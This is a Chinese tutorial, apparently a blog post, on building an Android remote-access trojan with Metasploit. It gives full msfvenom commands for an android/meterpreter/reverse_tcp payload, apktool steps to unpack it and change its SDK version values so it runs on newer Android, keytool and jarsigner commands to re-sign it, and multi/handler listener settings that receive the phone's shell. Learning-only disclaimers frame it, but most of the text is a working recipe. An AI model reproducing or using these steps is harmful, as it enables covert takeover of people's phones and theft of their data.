msf木马试验 安卓篇

218 阅读3分钟

免责声明:

本实验仅供学习参考,禁止用于非法用途! 如用于非法行为,后果自行负责!

试验材料准备

kali linux,下载地址:www.kali.org/
apktools,下载地址:apktool.org/
java,java环境的配置请自行寻找教程

一、制作木马程序

第一步、生成木马:

使用msf工具生成木马,命令如下:

msfvenom -p android/meterpreter/reverse_tcp LHOST=[此处为kali的ip] LPORT=[此处为监听端口号] R > [此处为路径与木马程序名称].apk

image.png

第二步、加工木马:

  1. 在物理机中创建一个非中文命名的文件,并将kali中生成的木马文件与之前下载的apktools转入此文件夹中 image.png

  2. 在此目录下启动命令行并输入如下指令:

java -jar apktool_2.9.3.jar d -f [木马名称].apk -o [程序解包后的文件夹名称]

image.png

  1. 打开解包生成的文件夹,找到并以记事本或vscode打开名为apktools.yml的文件,按下图所示修改: image.png 将红框内的参数;10改成16。17改成23。完成后保存退出

  2. 重新打包木马程序,命令如下:

java -jar apktool_2.9.3.jar b [之前解包后生成的文件夹名称] -o [新的程序名].apk

image.png

  1. 使用java自带的标准库keytool生成签名证书,命令如下:
keytool -genkeypair -alias sss -keyalg RSA -validity 100 -keystore sss.jks 

image.png 口令随便写

身份信息同样 image.png

出现如下图: image.png 摁y,然后回车

完成后可以看到文件夹中生成了名为sss.jks的证书: image.png

  1. 对刚才重新打包的程序进行签名,命令如下:
jarsigner -verbose -keystore sss.jks -signedjar [签名后的程序名称].apk [未签名的程序名称].apk sss

回车后输入之前设置的口令,就可以得到签名后的程序 image.png 至此木马程序制作完成

二、开始测试

  1. 在kali中启动msf攻击平台 image.png

  2. 配置监听,指令如下:

use exploit/multi/handler    //启用监听模块
set payload android/meterpreter/reverse_tcp    //设置payload
set LHOST [kali的ip]
set LPORT [端口号]

image.png options指令检查,配置好后输入run指令开始监听 image.png

  1. 将在物理机中制作好的木马程序导入手机并安装运行

image.png 此时kali中开始接收木马开始工作

  1. 输入sysinfo指令,可得到手机的系统信息

image.png 本实验只使用sysinfo指令,其他指令请自行实验

  • 实验到此完成。完成本实验后请立刻清除电脑与手机中制作的木马程序,禁止传播流出!

再次声明:

本实验仅供学习参考,禁止用于非法用途!如用于非法行为,后果自行负责!

总结

本实验可在虚拟机中安装安卓系统进行操作,或可直接安装任意一家的安卓模拟器进行。

注:如对实体手机进行测试需要将kali的网络连接模式切换为网桥模式,使用虚拟机可以用nat模式,总之需要将目标安卓系统与kali系统保持在同一网段下

msf工具生成的木马可以直接进行测试,但只适用于安卓老版本。新版本安卓系统则需要本实验中的方法进行二次制作